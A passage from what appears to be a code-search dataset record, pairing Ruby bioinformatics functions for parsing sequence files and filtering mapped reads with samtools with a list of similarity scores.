geo_record)\n fr_puts \" Attach GEO IDs to protocol: '#{previous_protocol.to_s}'\" \n else # there must be a geo colunn\n\n # finding a geo header index.\n geo_header_idx = s.find_index { |h| h.name =~ /geo/i }\n\n if geo_header_idx then\n previous_protocol = s.slice(geo_header_idx, s.length).find { |col| col.heading =~ /Protocol REF/i }; previous_protocol_name = previous_protocol.split_example unless previous_protocol.nil?\n next_protocol = s.slice(0, geo_header_idx).reverse.find { |col| col.heading =~ /Protocol REF/i }; next_protocol_name = next_protocol.split_example unless next_protocol.nil?\n # Attach GEO IDs to existing GEO ID column\n fr_puts \" Found existing GEO ID column for #{pid} between: '#{previous_protocol_name.to_s}' AND '#{next_protocol_name.to_s}'\" \n sdrf_rows = s[geo_header_idx].rows\n geo_header_col = s[geo_header_idx]\n\n if sdrf_rows != gsms.size then\n raise Exception.new(\"Can't match #{sdrf_rows} SDRF rows to #{gsms.size} GEO ids!\")\n \n ## Attach GEO IDs, lining up duplicates with the previous row in the SDRF with the appropriate number of unique values\n #fr_puts \" There are more rows in the SDRF than GSM IDs: #{sdrf_rows} != #{gsms.size}.\" \n # Have to line this up carefully\n #uniq_rows = enough_replicates_at.uniq_rows\n #fr_puts \" Unique rows for #{enough_replicates_at.heading} [#{enough_replicates_at.name}]: \" + uniq_rows.pretty_inspect \n #geo_header_col.values.clear\n #uniq_rows.each_index { |is_idx|\n # uniq_rows[is_idx].each { |i|\n # geo_header_col.values[i] = gsms[is_idx]\n # }\n #}\n #fr_puts \" Setting GSMs to: \" + geo_header_col.values.join(\", \") \n else\n # Attach GEO IDs to the SDRF in order\n geo_header_col.values.clear\n gsms.each_index { |i|\n geo_header_col.values[i] = gsms[i]\n }\n fr_puts \" Setting GSMs to: \" + geo_header_col.values.join(\", \") \n end\n geo_record = geo_header_col\n else # No protocol column and no geo header idx. should never happen.\n raise Exception.new(\"No protocol column or existing GEO column was specified. This should never happen!\")\n end\n end\n\n # If batchmode, make the project's subfolder within out\n output_sdrfdir = @batchmode ? File.join(output_basedir.path, pid.to_s) : output_basedir.path \n FileUtils.mkdir_p(output_sdrfdir)\n out_sdrf = File.join(output_sdrfdir, File.basename(sdrf))\n\n # Create new SDRF, overwriting existing sdrf only if not in batchmode\n print_sdrf(header, out_sdrf, !@batchmode)\n\n info[:geo_header_col] = geo_header_col\n info[:geo_record] = geo_record\n info[:previous_protocol_name] = previous_protocol_name\n\n # stick info in the hash to be remembered\n all_infos << info\n # Write a marshal file\n marshal_filename = GEOID_MARSHAL\n out_marshal = File.join(output_sdrfdir, marshal_filename) \n marshal_file = File.new(out_marshal, \"w\")\n marshal_file.puts(Marshal.dump(info))\n marshal_file.close\n \n marshal_list.puts File.join(pid.to_s, marshal_filename) if @batchmode \n \n } \n \n marshal_list.close if @batchmode\n \n # Then, run the database stuff on all_infos\n attached_geoids = update_db(all_infos, no_db_commits)\n attached_geoids\n end",
"def parse_to_file(line)\n\n z_unique = File.new(@outdir+\"_unique\", 'w')\n z_non_unique = File.new(@outdir+\"_non_unique\", 'w')\n\n while !@filehandler.eof?\n entry1 = make_content(line)\n line = @filehandler.readline()\n entry2 = make_content(line)\n if entry1.q_name == entry2.q_name\n # What if on same chromosome?\n # calling helper procedure\n entries << entry1\n marker2 = true\n while entry1.q_name == entry2.q_name\n\n if entry1.t_name == entry2.t_name\n\n entries << entry2\n\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_content(line)\n marker = 1\n end\n\n else\n marker2 = false\n\n @counter_non_unique += 1\n\n out = \"#{entry1.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n\n while entry1.qname == entry2.qname\n\n out = \"#{entry2.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_content(line)\n marker = 1\n end\n end\n\n end\n\n if marker2\n is_in_range?(entries, z_unique, z_non_unique)\n end\n\n\n else\n @counter_unique += 1\n out = \"#{entry1.to_s()}\"\n z_unique.write(out+\"\\n\")\n marker = false\n end\n end\n if marker\n @counter_unique += 1\n out = \"#{entry2.to_s()}\"\n z_unique.write(out+\"\\n\")\n end\n\n puts \"Unique: #{@counter_unique} Non_unique: #{@counter_non_unique}\"\n z_non_unique.close\n z_unique.close\n end",
"def get_references\n references_hash = {}\n FasterCSV.foreach(\"#{Source_path}/TbReference.csv\", :quote_char => '\"', :col_sep =>',', :row_sep =>:auto) do |row|\n references_hash[row[0]] = row[6]\n end\n return references_hash\nend",
"def fastq_to_hash(fastq_file)\n count = 0\n sequence_a = []\n quality_a = []\n count_seq = 0\n\n File.open(fastq_file,'r') do |file|\n file.readlines.collect do |line|\n count +=1\n count_m = count % 4\n if count_m == 1\n line.tr!('@','>')\n sequence_a << line.chomp\n quality_a << line.chomp\n count_seq += 1\n elsif count_m == 2\n sequence_a << line.chomp\n elsif count_m == 0\n quality_a << line.chomp\n end\n end\n end\n sequence_hash = Hash[*sequence_a]\n quality_hash = Hash[*quality_a]\n return_hash = {}\n sequence_hash.each do |k,v|\n return_hash[k] = [v, quality_hash[k]]\n end\n return return_hash\nend",
"def pair_fasta_to_hash(indir)\n files = Dir[indir + \"/*\"]\n r1_file = \"\"\n r2_file = \"\"\n files.each do |f|\n if File.basename(f) =~ /r1/\n r1_file = f\n elsif File.basename(f) =~ /r2/\n r2_file = f\n end\n end\n\n seq1 = fasta_to_hash(r1_file)\n seq2 = fasta_to_hash(r2_file)\n\n new_seq1 = seq1.each_with_object({}) {|(k, v), h| h[k[0..-4]] = v}\n new_seq2 = seq2.each_with_object({}) {|(k, v), h| h[k[0..-4]] = v}\n\n seq_pair_hash = {}\n\n new_seq1.each do |seq_name,seq|\n seq_pair_hash[seq_name] = [seq, new_seq2[seq_name]]\n end\n return seq_pair_hash\nend",
"def fastq_to_fasta(fastq_file)\n count = 0\n sequence_a = []\n count_seq = 0\n\n File.open(fastq_file,'r') do |file|\n file.readlines.collect do |line|\n count +=1\n count_m = count % 4\n if count_m == 1\n line.tr!('@','>')\n sequence_a << line.chomp\n count_seq += 1\n elsif count_m == 2\n sequence_a << line.chomp\n end\n end\n end\n sequence_hash = Hash[*sequence_a]\nend",
"def generate_map\n end",
"def all_readings\n @readings.map do |reading|\n [reading] + reading.role_refs.map{|rr| rr.objectification_join}\n end.flatten.compact\n end",
"def gene_obj_mapping(line, query_name, columns_info)\n return line.start_with?('http://togogenome.org/gene/') unless\n line.force_encoding('UTF-8')\n line = line.encode(\"UTF-16BE\", \"UTF-8\", :invalid => :replace, :undef => :replace, :replace => '?').encode(\"UTF-8\")\n columns = line.split('^@')\n values = {}\n columns_info.each do |column|\n if column[\"is_identify\"]\n gene_no = columns[column[\"column_number\"]].strip.gsub('http://togogenome.org/gene/','')\n values[\"@id\"] = \"http://togogenome.org/gene/#{gene_no}\"\n values[\"gene_id\"] = to_utf(gene_no)\n else # expect id columns are\n value = columns[column[\"column_number\"]].split(\"|||\").map do |entry|\n # irregular case\n if column[\"column_name\"] == 'uniprot_id'\n to_utf(entry.strip.split('/').last)\n elsif query_name == 'protein_cross_references' && column[\"column_name\"] == 'up_xref_ids'\n to_utf(entry.strip.split('/').last)\n elsif query_name == 'protein_sequence_annotation' && column[\"column_name\"] == 'up_seq_anno_feature_ids'\n to_utf(entry.strip.strip.gsub('http://purl.uniprot.org/annotation/',''))\n else\n to_utf(entry.strip)\n end\n end\n values[column[\"column_name\"]] = value\n end\n end\n values\nend",
"def index_commands\n File.foreach \"/home/#{$username}/#{$filename}\" do |line|\n\tline = line.chomp\n\tif !$unique_seq.include?(line)\n\t $unique_seq << line\n\tend\n end\n File.foreach \"/home/#{$username}/#{$filename}\" do |line|\n\tline = line.chomp\n\t$observation_seq << $unique_seq.index(line)\n end\nend",
"def fetchIDs\n\n\tFile.open(ARGV[0].to_s, \"r\") do |file|\n\n\t\t\n\t\tbook = Hash.new\n\n\t\tfile.each_line do |line|\n\n\t\t\tcontainer = Array.new\n\n\t\t\tif line.include? \"Name\"\n\n\t\t\t\tcontainer = line.split(\";\")\n\t\t\t\tcontainer.map { |e| book[\"#{e.gsub!(\"Name=\", \"\")}\"] = line if e.include? \"Name=\" } \n\n\t\t\telse\n\t\t\t\tnext\n\t\t\tend\t\n\t\tend\n\n\t\t#puts book.inspect\n\t\tfile_write(\"Helicoverpa.out\", book)\n\tend\t\t\nend",
"def get_reads(features)\n result = {}\n result[:watson] = features.select { |f| f.strand == '+' }.collect { |e| e.to_read }\n result[:crick] = features.select { |f| f.strand == '-' }.collect { |e| e.to_read }\n return result\n end",
"def last_scans(options = {})\r\n nexpose_ids= Hash.new(-1)\r\n trimmed_csv = load_last_scans(options)\r\n trimmed_csv.drop(1).each do |row|\r\n nexpose_ids[row[0]] = row[1]\r\n end\r\n nexpose_ids\r\n end",
"def get_unique_keys_hash\n columns = unique_key_columns << :id\n Hash[select(columns).load.map { |r| [r.unique_key, r.id] }]\n end",
"def split_refseq\n # prepare output files\n system(%Q[cut -f4 #{$prepare_dir}/refseq_genes_result.tsv | cut -c1-5 | sort | uniq > #{$prepare_dir}/refp_prefix_list.txt ]) # get exist prefix list of protein_id\n FileUtils.mkdir_p(\"#{$prepare_dir}/refp\") unless File.exist?(\"#{$prepare_dir}/refp\")\n refp_output = {}\n File.open(\"#{$prepare_dir}/refp_prefix_list.txt\") do |f|\n f.each_line do |line|\n prefix = line.chomp.strip\n refp_output[prefix] = File.open(\"#{$prepare_dir}/refp/#{prefix}.dat\", \"w\")\n end\n end\n refp_output[\"no_protein_id\"] = File.open(\"#{$prepare_dir}/refp/no_protein_id.dat\", \"w\") # protein_id is optional\n\n File.open(\"#{$prepare_dir}/refseq_genes_result.tsv\") do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n prefix = (columns[3].nil? || columns[3] == \"\") ? \"no_protein_id\" : columns[3][0..4] # protein_id is optional\n refp_output[prefix].puts line.chomp.strip\n end\n end\n refp_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def get_mapping(cid)\n dir = ASF::SVN['ldap-map']\n filename = File.join(dir, MAPPING_FILE).untaint\n maps = JSON.parse(File.read(filename))\n if maps.has_key?(cid)\n return maps[cid]\n else\n return { COMMITTERID => cid }\n end\nend",
"def reader_ids\n group_user_ids(readers_join_table)\n end",
"def km_reduce_reacid(acc, crt)\n return acc if crt[\"reaction\"].nil?\n k = crt[\"entry\"][0].match(/^(?<id>M\\d{5})/)[:id]\n r = km_get_reacid(crt[\"reaction\"])\n return acc if r.empty?\n acc[k] = r\n return acc\nend",
"def target_id; genomic.entry_id; end",
"def annotate\n genes={}\n File.open(ANNOTATION,'r').each do |line|\n temp=line.split\n genes[temp[9]]={}\n genes[temp[9]][\"start\"]=temp[3].to_i\n genes[temp[9]][\"end\"]=temp[4].to_i\n genes[temp[9]][\"strand\"]=temp[6]\n genes[temp[9]][\"length\"]=temp[4].to_i - 1 - temp[3].to_i\n end\n return genes\nend",
"def read(entry); end",
"def fasta_to_hash(infile)\n f=File.open(infile,\"r\")\n return_hash = {}\n name = \"\"\n while line = f.gets do\n if line =~ /^\\>/\n name = line.chomp\n return_hash[name] = \"\"\n else\n return_hash[name] += line.chomp\n end\n end\n f.close\n return return_hash\nend",
"def fasta_to_hash(infile)\n f=File.open(infile,\"r\")\n return_hash = {}\n name = \"\"\n while line = f.gets do\n if line =~ /^\\>/\n name = line.chomp\n return_hash[name] = \"\"\n else\n return_hash[name] += line.chomp\n end\n end\n f.close\n return return_hash\nend",
"def readRaw\n puts \"Reading raw data..\"\n # data = {uid => {iid => [hour1, hour2, ...]}}}\n data = {}\n while line = $stdin.gets do\n uid, iid, hour = line.chomp.split(',').map {|e| e.to_i}\n data[uid] = {} unless data.key?(uid)\n data[uid][iid] = [] unless data[uid].key?(iid)\n data[uid][iid] += [hour]\n end\n data.each_pair do |u, ihs|\n ihs.each_key {|i| ihs[i].uniq.sort}\n end\n return data\nend",
"def underbang_reader(key); end",
"def final_candidates(before, after, output_file)\n\t\tcandidates = {}\n\t\tall_ids = {}\n\n\t\t# Read circular candidates into hash\n\t\tFile.open(before, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")\n\t\n\t\t\tpos = [line[0..1], line[3..4]].join(':')\n\t\t\tread_count = line[6].to_i\n\t\t\tqname = line[-1].split(';')\n\t\n\t\t\t# Create qname index to make search faster\n\t\t\t# Remark 2\n\t\t\tqname.each do |q|\n\t\t\t\tk1, k2 = q.split(':')[3..4]\n\t\t\n\t\t\t\tall_ids[k1] = {} if !all_ids.has_key?(k1)\n\t\t\n\t\t\t\tif !all_ids[k1].has_key?(k2)\n\t\t\t\t\tall_ids[k1][k2] = [q]\n\t\t\t\telse\n\t\t\t\t\tall_ids[k1][k2] << q\n\t\t\t\tend\n\t\t\tend\n\n\t\t\tcandidates[pos] = {:counts => read_count, :qnames => qname}\n\t\tend\n\n\t\t# Read remapped readpairs and compare them to initial candidates\n\t\tFile.open(after, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")\n\t\n\t\t\tqname = line[0]\n\t\t\tpos = [line[1..2], line[3..4]].join(':')\n\t\t\tk1, k2 = qname.split(':')[3..4]\n\n\t\t\tread_unused = (!all_ids.has_key?(k1) || !all_ids[k1].has_key?(k2) || !all_ids[k1][k2].include?(qname)) \n\t\t\t\t\t\t\n\t\t\t# Add read if read is not already used (condition 2)\n\t\t\tif candidates.has_key?(pos) && read_unused \n\t\t\t\tcandidates[pos][:counts] += 1\n\t\t\t\tcandidates[pos][:qnames] << qname\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput.puts %w(chr pos_a chr_b pos_b readCounts qnames).join(\"\\t\")\n\t\n\t\t\tcandidates.each do |pos, v| \n\t\t\t\toutput.puts [pos.split(':'), v[:counts], v[:qnames].join(';')].join(\"\\t\")\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Final candidate list finished.\"\n\tend",
"def merge_read_to_run(runid, reads)\n if reads.size == 1\n (reads[0].drop(1).insert(0, runid) << \"SINGLE\").join(\"\\t\")\n else\n pairs = remove_nonpair(reads)\n if pairs.size == 2\n merge_paired_reads(pairs).join(\"\\t\")\n else\n \"PAIR CORRUPTED: #{runid}\"\n end\n end\n end",
"def each_unread read\n @rmutex.read_sync do\n @readable.each do |m|\n unless read.include? m.id\n yield m\n end\n end\n end\n end",
"def process_mapline(line,zoneid,node_id, map)\n offset = 0\n length = 6\n lineLength = line.length\n map[zoneid] = Hash.new\n count = 0\n while offset < lineLength\n x = \"#{line[offset,2]}.#{line[offset+2,1]}\"\n y = \"#{line[offset+3,2]}.#{line[offset+5,1]}\"\n offset = offset + 6\n map[zoneid][gather_coords(x.to_f,y.to_f)] = node_id\n count +=1\n end\n return count\nend",
"def process_map_interface\n\n # Initialize vars\n h_ints_map_out = Hash.new\n\n # open the file with list of interfaces to process, and zone to map each to\n intsfile = File.open($opts[:interfacemapout], 'r')\n\n intsfile.each_line do |x|\n key, val = x.split\n h_ints_map_out[key] = val\n end\n\n intsfile.close\n return h_ints_map_out\nend",
"def mapsUnique?()\n return false unless passed_filter?\n return false if unmapped_Ns? || unmapped?\n if @chrom =~ /^\\d+:\\d+:\\d+$/\n false\n else\n true\n end\n end",
"def get_crosswalk_record_having_mapping_code_factor(crosswalk_records)\n rcc_log.debug \"Obtains the crosswalk record based on the mapping code factor : #{mapping_code_factor}\"\n crosswalk_record_having_mapping_code_factor = nil\n if crosswalk_records.present?\n crosswalk_records.each do |crosswalk_record|\n if crosswalk_record.present?\n if mapping_code_factor == 'HIPAA CODE'\n crosswalked_code = hipaa_code_related_to_partner_and_payment_condition(crosswalk_record)\n elsif @is_partner_bac && mapping_code_factor == 'CLIENT CODE'\n crosswalked_code = client_code_related_to_partner_and_payment_condition(crosswalk_record)\n end\n if crosswalked_code.present?\n crosswalk_record_having_mapping_code_factor = crosswalk_record\n break\n end\n end\n end\n end\n rcc_log.debug \"The chosen crosswalked record having the mapping_code_factor, \\\n #{mapping_code_factor} is #{crosswalk_record_having_mapping_code_factor.id if crosswalk_record_having_mapping_code_factor.present?}\"\n crosswalk_record_having_mapping_code_factor\n end",
"def si_map\n @si_map.values\n end",
"def reads\n (1..read_count).to_a\n end",
"def uniq_sequence(seq = {}, sequence_name = \"sequence\")\n uni = count(seq.values)\n new_seq = {}\n n = 1\n uni.each do |s,c|\n name = \">\" + sequence_name + \"_\" + n.to_s + \"_\" + c.to_s\n new_seq[name] = s\n n += 1\n end\n return new_seq\nend",
"def get_default_data_processing_ids(io, index_list, lookback=300)\n hash = {}\n index_list.each_pair do |name, index|\n if index.size > 0\n # ^ we cannot quickly retrieve a defaultDataProcessingRef unless there\n # is at least one spectrum/chromatogram to start with. However, if\n # there is no spectrum/chromatogram, then the defaultDataProcessingRef\n # will not be needed either.\n io.bookmark do |io|\n io.pos = index[0] - lookback \n hash[name] = io.read(lookback)[/<#{name}List.*defaultDataProcessingRef=['\"](.*?)['\"]/m, 1]\n end\n end\n end\n hash\n end",
"def genome_map\n @genome_map ||= %w(A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)\n end",
"def get_common_lines\n file2 = @file2.dup\n common_lines = {}\n\n acc = 0\n @file1.each_with_index { |str, i|\n line = file2.index(str)\n unless line.nil?\n common_lines[i] = acc + line\n acc += line + 1\n file2 = file2.drop(line + 1)\n end\n }\n\n common_lines\n end",
"def process_externals_hash\n File.open(\"./lib/externals/externals_table_data_input_hash.txt\", \"r\") do |f|\n f.each_line do |line|\n external_searched, searched = line.chomp.split(\"\\t\")\n # created_sequence_id = external_searched(/continue code/)\n # creation_sequence_id = \n # complete_sequence_id = \n # lexigram_sequence_id = \n # singular_sequence_id = complete_sequence_id.squeeze\n puts \"#{external_searched.to_textual}\\t#{searched}\" \n sleep(0.01)\n end\n end\n end",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def read_summary(fname)\n hash={}\n # Read file\n File.open(fname,'r') do |f|\n # Loop over line\n f.each_line do |line|\n line.chomp!\n index,content = line.split(/\\s*==\\s*/)\n hash[index] = content # index:id, content:path\n end\n end\n return hash\nend",
"def parse_to_file(outdir)\n z_unique = File.new(outdir+\"_unique\", 'w')\n z_non_unique = File.new(outdir+\"_non_unique\", 'w')\n entries = []\n while !@filehandler.eof?\n entry1 = make_entry()\n line = @filehandler.readline()\n entry2 = make_entry()\n if entry1.q_name == entry2.q_name\n # What if on same chromosome?\n # calling helper procedure\n entries << entry1\n marker2 = true\n while entry1.q_name == entry2.q_name\n # same chrosome?\n if entry1.t_name == entry2.t_name\n entries << entry2\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_entry()\n marker = true\n end\n else\n marker2 = false\n @counter_non_unique += 1\n out = \"#{entry1.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n while entry1.q_name == entry2.q_name\n out = \"#{entry2.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_entry()\n marker = 1\n end\n end\n end\n if marker2\n is_in_range?(entries, z_unique, z_non_unique)\n end\n end\n else\n @counter_unique += 1\n out = \"#{entry1.to_s()}\"\n z_unique.write(out+\"\\n\")\n marker = false\n end\n end\n if marker\n @counter_unique += 1\n out = \"#{entry2.to_s()}\"\n z_unique.write(out+\"\\n\")\n end\n\n z_non_unique.close\n z_unique.close\n end",
"def catkey_report_rows\n constituent_info_with_catkeys = constituent_info.select { |_druid, info_hash| info_hash[:catkeys].present? }\n constituent_info_with_catkeys.map do |druid, info_hash|\n info_hash[:catkeys].map { |catalog_link| [druid, catalog_link['catalogRecordId']] }.flatten\n end\n end",
"def iterate_unique_views\n identify_unique_views_parsed_file.each do |u|\n unique_file_path_array << u[0]\n end\n unique_file_path_array\n end",
"def mapped_id(partial_id)\n globs = dir_glob(partial_id)\n if globs.size == 1\n IO.read(globs[0])\n else\n partial_id\n end\n end",
"def uniq!\n im = Rubinius::IdentityMap.from self\n return if im.size == size\n\n Rubinius.check_frozen\n\n array = im.to_array\n @tuple = array.tuple\n @start = array.start\n @total = array.total\n\n self\n end"
] |
[
"0.6373402",
"0.6143493",
"0.59263504",
"0.57691497",
"0.5676399",
"0.5657573",
"0.5556849",
"0.5538333",
"0.55204505",
"0.5498366",
"0.5496701",
"0.5448031",
"0.53502053",
"0.5329921",
"0.52846646",
"0.52826154",
"0.5208021",
"0.5208021",
"0.51964045",
"0.51787305",
"0.51546603",
"0.51320237",
"0.5117705",
"0.51173085",
"0.5101994",
"0.5096823",
"0.50823975",
"0.507375",
"0.50729245",
"0.5072525",
"0.5068136",
"0.5067115",
"0.5065262",
"0.50555557",
"0.5051112",
"0.50465167",
"0.5038522",
"0.5034716",
"0.5032274",
"0.5015474",
"0.5015474",
"0.5008573",
"0.49893233",
"0.4988839",
"0.4986537",
"0.49853837",
"0.49798298",
"0.49729487",
"0.49703315",
"0.49684098",
"0.49583322",
"0.49518734",
"0.4942803",
"0.49416757",
"0.4935645",
"0.49329048",
"0.49287948",
"0.492612",
"0.49221173",
"0.49201623",
"0.49191543",
"0.4916283",
"0.4905833",
"0.4903921",
"0.49020323",
"0.49017152",
"0.4894644",
"0.48931777",
"0.48871693",
"0.4885407",
"0.4881431",
"0.4877256",
"0.48754314",
"0.48707625",
"0.48689952",
"0.48651958",
"0.48651958",
"0.4864812",
"0.4863872",
"0.4856134",
"0.48536634",
"0.4845419",
"0.48420474",
"0.48419937",
"0.48352605",
"0.48329383",
"0.48298278",
"0.4829586",
"0.48294976",
"0.48283803",
"0.48265648",
"0.48247045",
"0.482119",
"0.4814938",
"0.4810638",
"0.47994223",
"0.47940606",
"0.47931296",
"0.47884694",
"0.47857955"
] |
0.740286
|
0
|
Extracts uniquely mapping reads with i mismatches mis number of mismatches
|
def extract_uni_err(mis)
run_cmd(
"samtools view -H #{@names.get('mapped_uniqsort')}" \
"> #{@names.get('mapped_uni', mis)}"
)
run_cmd(
"samtools view -h #{@names.get('mapped_uniqsort')} " \
"| grep -E '([nN]M:i:#{mis})|(^@)' " \
'| samtools view -S - ' \
">> #{@names.get('mapped_uni', mis)}"
)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def extract_uni\n # Extract all uniquely mapping reads\n run_cmd(\n \"samtools view -H #{@names.get('mapped_merged')} \" \\\n \"> #{@names.get('mapped_uniq')}\"\n )\n run_cmd(\n \"samtools view -h #{@names.get('mapped_merged')} \" \\\n \"| grep -P 'NH:i:1(\\t|$)' \" \\\n \">> #{@names.get('mapped_uniq')}\"\n )\n run_cmd(\n \"samtools sort -o #{@names.get('mapped_uniqsort')} -O bam -T \" \\\n \"tmp.bam #{@names.get('mapped_uniq')}\"\n )\n end",
"def remapped_reads(input_file, output_file, read_length, mm=2)\n\t\tremapped = {}\n\t\t\n\t\t# Filter remapped reads\n\t\tinput_file.each do |line|\n\t\t\tmdz = line.match(/MD:Z:\\S*/).to_s\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\tqname, mate = line[0].split('/')\n\t\t\tpos = line[2].split(':')\n\t\t\tcigar = line[5]\n\t\n\t\t\tif !remapped.has_key?(qname) && Alignment.max_mismatches?(mdz, mm) && cigar == \"#{read_length}M\"\n\t\t\t\tremapped[qname] = [pos, mate]\n\t\t\telse\t\n\t\t\t\tremapped.delete(qname)\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\tremapped.each {|k, v| output.puts [\"#{k}/#{v[-1]}\", v[0]].join(\"\\t\")}\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found remapped reads.\"\n\tend",
"def check_matchness(aa_sequence_hash,nt_sequence_hash)\n missing_nt_sequence = Array.new\n aa_sequence_hash.each do |defi, seq|\n if nt_sequence_hash[defi].nil? \n # miss that stuff\n missing_nt_sequence << defi\n end\n end\n\n missing_aa_sequence = Array.new\n nt_sequence_hash.each do |defi, seq|\n if aa_sequence_hash[defi].nil?\n missing_aa_sequence << defi\n end\n end\n\n\n return missing_aa_sequence, missing_nt_sequence\n end",
"def hash_mm_selreads(cigarstring, selread)\n\t\thash = Hash.new {|h,k| h[k] = {} }\n\t\tcount = 0\n\t\tcigarstring.split(\",\").each do |cig|\n\t\t\tcigar = Cigar.find_by(id: cig)\n\t\t\tif selread.key?(cigar.read_id.to_s) == true\n\t\t\t\tif selread[cigar.read_id.to_s][:cigar] != cigar.data.to_s\n\t\t\t\t\thash[cigar.read_id] = [cigar.data, cigar.pos].join(\"\\t\")\n\t\t\t\t\tcount = count + 1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn hash, count.to_i\n\tend",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
